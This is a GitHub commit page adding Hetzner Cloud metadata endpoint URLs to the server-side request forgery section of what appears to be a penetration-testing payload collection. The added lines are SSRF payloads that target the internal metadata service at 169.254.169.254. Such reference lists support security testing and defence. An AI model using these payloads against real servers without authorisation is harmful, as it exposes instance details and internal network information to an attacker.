Skip to content

Commit

Permalink
Merge pull request #711 from bsysop/patch-3
Browse files Browse the repository at this point in the history
Adding Hetzner Cloud Metadata URL
  • Loading branch information
swisskyrepo committed Apr 5, 2024
2 parents 80dda8b + 3c9fdec commit 9571306
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions Server Side Request Forgery/README.md
Expand Up @@ -805,6 +805,18 @@ http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```

### SSRF URL for Hetzner Cloud

```powershell
http://169.254.169.254/hetzner/v1/metadata
http://169.254.169.254/hetzner/v1/metadata/hostname
http://169.254.169.254/hetzner/v1/metadata/instance-id
http://169.254.169.254/hetzner/v1/metadata/public-ipv4
http://169.254.169.254/hetzner/v1/metadata/private-networks
http://169.254.169.254/hetzner/v1/metadata/availability-zone
http://169.254.169.254/hetzner/v1/metadata/region
```

### SSRF URL for Kubernetes ETCD

Can contain API keys and internal ip and ports
Expand Down

0 comments on commit 9571306

Please sign in to comment.